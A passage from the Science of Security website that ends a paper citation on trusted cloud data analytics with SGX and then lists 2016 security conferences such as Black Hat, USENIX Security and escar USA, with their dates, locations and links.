Keywords: cloud computing; data analysis; data integrity; trusted computing; SGX; TCB; VC3;average runtime overhead; base security guarantees; cloud; hypervisor; memory regions; read-write integrity; region self-integrity invariants; secure distributed MapReduce computations; trustworthy data analytics; unmodified Hadoop; Encryption; Operating systems; Program processors; Protocols; Virtual machine monitors (ID#: 16-9450)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163017&isnumber=7163005


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Upcoming Events of Interest

SoS Logo

Upcoming Events of Interest

Mark your calendars!

This section features a wide variety of upcoming security-related conferences, workshops, symposiums, competitions, and events happening in the United States and the world. This list also includes several past events with links to proceedings or summaries of the actual activities.

Note: The events may also be found on the SoS Calendar, located by clicking the 'Calendar' tab on the left-hand navigation bar.


escar USA 2016
The overall goal and objective of the escar USA workshop is to provide a forum to encourage collaboration among private industry (e.g. , OEMs, suppliers, vendors), academia, and government (e.g., DOT, NHTSA, DoD, DHS, European Commission) regarding modern in-vehicle Cyber Security threats, vulnerabilities, and risk mitigation/countermeasures. In addition to Cyber Security, escar also addresses other automotive security issues such as electronic theft protection and new digital business models. This workshop will create the opportunity for information exchange, networking, and collaboration among your peers and a setting to define research needs. The workshop will also offer networking opportunities for (future) attendees in relevant government initiatives.
Date: June 1 - 2
Location: Detroit, MI
URL: https://www.escar.info/escar-usa.html

Techno Security & Forensics Investigation Conference
The Eighteenth Annual International Techno Security & Forensics Investigations Conference will be held June 5 - June 8 in sunny Myrtle Beach at the Myrtle Beach Marriott Resort. This conference promises to be the international meeting place for IT Security professionals from around the world. The conference will feature some of the top speakers in the industry and will raise international awareness towards increased education and ethics in IT security.
Date: June 5 - 8
Location: Myrtle Beach, SC
URL: http://www.technosecurity.us/Content/Welcome

Infosecurity Europe
Infosecurity Europe is the founding brand of Infosecurity Group - a business unit of Reed Exhibitions UK Ltd. It is Europe's number one information security event, featuring the largest and most comprehensive education programme, and over 315 exhibitors showcasing the most diverse range of products and services to 12,000 visitors.
Date: June 7 - 9
Location: London, UK
URL: http://www.infosecurityeurope.com/

AFCEA Homeland Security Conference 2016
The AFCEA Homeland Security Conference is your chance to bring your products and solutions right to decision-makers within the homeland security community. The 2016 event will offer enhanced oppurtunitiesfor networking between business and government, such as lunches held in the exhibit area each day, as well as an impressive program of keynote speakers, panelists and sessions.
Date: June 21 - 22
Location:
Washington D.C.
URL: http://events.afcea.org//homeland16/Public/enter.aspx

Security of Things World
Exploring Security and the Internet of Things. A world class event focused on the next information security revolution. Be part of Security of Things World in June in Berlin to tailor your proposition to respond to the security concerns that preoccupy enterprise customers today and find pragmatic solutions to the most common security threats.
Date: June 27 - 28
Location: Berlin, Germany
URL: http://securityofthingsworld.com/en/


Appsec Europe 2016
OWASP is a nonprofit community organization with 200 chapters in over 100 countries around the world. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. Our wiki has a wealth of security knowledge and we are well known for many of our influential security projects. The OWASP AppSec conferences represent our largest outreach efforts to advance our mission of spreading security knowledge. These events help fund the non-profit organization and provide a great learning experience for everyone involved. Many thanks to our conference sponsors, OWASP foundation sponsors, and most importantly the OWASP community!
Date: June 27 - July 1
Location: Rome, Italy
URL: http://2016.appsec.eu/

European Conference on Cyber Warfare and Security
It is now 15 years since the European Conference on Cyber Warfare and Security (ECCWS) was established. It has been held in Finland, Estonia, Greece, Portugal, England, The Netherlands to mention only a few of the countries which have hosted it. This conferences attracts an interesting combination of academic scholars, military personnel, practitioners and individuals who are engaged in various aspects of the cyber security community. ECCWS is generally attended by participants from more than 30 countries. The Journal of Information Warfare regularly publishes a number of the papers presented at this conference.
Date: July 7 - 8
Location: Munich, Germany
URL: http://www.academic-conferences.org/conferences/eccws/

International Symposium on Human Aspects of Information Security & Assurance (HAISA 2016)
We invite you to participate in the International Symposium on Human Aspects of Information Security & Assurance (HAISA 2016). The event will be held over the 19-21 July 2016 in the city of Frankfurt, Germany in association with the Eleventh International Network Conference (INC2016). This symposium, the tenth in our series, will bring together leading figures from academia and industry to present and discuss the latest advances in information security from research and commercial perspectives.
Date: July 19 - 21
Location: Frankfurt, Germany
URL: http://www.haisa.org/

AFCEA Classified Cyber Forum 2016
The AFCEA Classified Cyber Forum is a one day event focusing on the substantial threats sophisticated adversaries pose to government and industry, computer networks, and data that require the U.S. government to leverage private sector resources and capabilities. The agenda will explore the challenges in accomplishing this goal and highlight where public-private sector cooperation is most needed.
Date: July 21
Location: Chantily, VA
URL: http://www.afcea.org/event/?q=CyberForum2016

Billington Global Automotive Cybersecurity Summit
The centerpiece of this day-long summit will be the keynote addresses by U.S. Secretary of Transportation Anthony Foxx, the country's top transportation official, and GM Chairman and CEO Mary Barra, the chief of the country's largest automaker. The automotive sector is taking some steps to bolster cybersecurity awareness and knowledge. Last year the industry created the Automotive Information Sharing and Analysis Center ("Auto-ISAC,") to enhance information sharing in the auto sector. In addition, companies are forming "coordinated disclosure programs" which allow security researchers to share cyber threats with the OEMS (Original Equipment Manufacturers.)
Date: July 22, 2016
Location: Detroit, MI
URL: http://www.billingtoncybersecurity.com/global-automotive-cybersecurity-summit/

Black Hat USA
Black Hat is the most technical and relevant global information security event series in the world. For more than 16 years, Black Hat has provided attendees with the very latest in information security research, development, and trends in a strictly vendor-neutral environment. These high-profile global events and Trainings are driven by the needs of the security community, striving to bring together the best minds in the industry. Black Hat inspires professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. From its inception in 1997, Black Hat has grown from a single annual conference in Las Vegas to the most respected information security event series internationally. Today, the Black Hat Briefings and Trainings are held annually in the United States, Europe and Asia, providing a premier venue for elite security researchers and trainers to find their audience.
Date: July 30 - August 4
Location: Las Vegas, NV
URL: https://www.blackhat.com/us-16/

TechNet Augusta 2016
TechNet Augusta provides a forum for key military professionals from the U.S. Defense Department, armed services and U.S. Coast Guard to discuss issues and share ideas. Government, industry and academic speakers address a range of topics and focus on the importance of the network, security issues and training to enable operational forces to modernize and be ready to meet emerging challenges in 2025 and beyond.
Date: August 2 - 4
Location: Augusta, GA
URL: http://events.afcea.org/Augusta16/Public/Enter.aspx

USENIX Security 2016
The USENIX Security Symposium brings together researchers, practitioners, system administrators, system programmers, and others interested in the latest advances in the security and privacy of computer systems and networks. The 25th USENIX Security Symposium will be held August 10-12, 2016, in Austin, TX.
Date: August 10 - 12
Location: Austin, TX
URL: https://www.usenix.org/conference/usenixsecurity16

Intelligence and National Security Summit 2016
Hosted by the two leading professional associations - AFCEA International (AFCEA) and the Intelligence and National Security Alliance (INSA) - this is the premier gathering of senior decision makers from government, military, industry and academia. In its first two years the summit drew more than 3,000 attendees, exhibitors and journalists. This two-day, unclassified summit boasts an impressive agenda again in 2016 with top federal agency leaders and policymakers sharing their assessments and priorities for U.S. intelligence over five plenary sessions. In addition, nine breakout sessions divided into three tracks - Cyber, Policy, and Enduring Issues - will allow for additional emphasis and discussion of contemporary challenges and opportunities. The Summit's collection of influential speakers and attendees makes this one event intelligence- and cyber-related companies cannot afford to miss as an attendee, exhibitor, or sponsor.
Date: September 7 - 8
Location: Washington D.C.
URL:
http://events.jspargo.com/inss16/public/enter.aspx

Rock Stars of Cybersecurity/Threats and Counter Measures
What Do Google, Adobe, Intel Health and Life Sciences, and PayPal Know About Cybersecurity That You Need to Know? Lots! The attackers have gotten more sophisticated. No company or person is safe. The only way to protect your organization and your personal data in 2016 is with a strong Cybersecurity solution. At Rock Stars of Risk-based Security, we've brought together the real leaders in this critical technology - Google, Adobe, PayPal, Intel Health and Life Sciences, and others - to talk about the trends, cybersecurity programs and advice on how you can develop real-world security solutions that work for your organization - and that don't disrupt your operations.
Date: September 13
Location: Seattle, WA
URL: https://www.computer.org/web/rock-stars/cybersec-seattle#fans

Global Identity Summit 2016
The Global Identity Summit provides an immersive environment where identity professionals from the federal government, private sector, and academia can dedicate three continuous days to strategic planning, information sharing, needs analysis, collaboration, and relationship building. GIS venues are chosen to support this environment (rather than drive-by participation), and enable concurrent presentation tracks, workshops, exhibition space, dining, and private events.
Date: September 19 - 22
Location: Tampa, FL
URL: http://events.afcea.org/GlobalID16/Public/enter.aspx

IEEE Intelligence and Security Informatics (ISI) 2016
Intelligence and Security Informatics (ISI) is an interdisciplinary research field involving academic researchers in information technologies, computer science, public policy, bioinformatics, medical informatics, and social and behavior studies; local, state, and federal law enforcement and intelligence experts; and information technology industry consultants and practitioners. ISI supports counterterrorism and homeland security's missions of anticipation, prevention, preparedness and response to security events, in physical, cyber, enterprise, and societal spaces. The 2016 conference will be held in Tucson, Arizona. This year, special workshops will provide participants with even more opportunities for information exchange, networking, and cross-domain problem-solving.
Date: September 27 - 30
Location: Tucson, AZ
URL: http://www.isi-conf.org/

MILCOM 2016
MILCOM is the one conference where command, control, and communication challenges are presented and discussed end to end - from research and development through existing solutions to future needs. It offers industry the opportunity to understand the breadth of requirements, the pace of change, and the state of play in a variety of C4I markets serving DoD as well as federal agencies, and multinational entities. Leaders across government, industry, and academia will address their needs, their issues, and their solutions in the rapidly evolving Cyber domain.
Date: November 1 - 3
Location: Baltimore, MD
URL: http://events.afcea.org/milcom16/public/enter.aspx


(ID#:16-11357)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.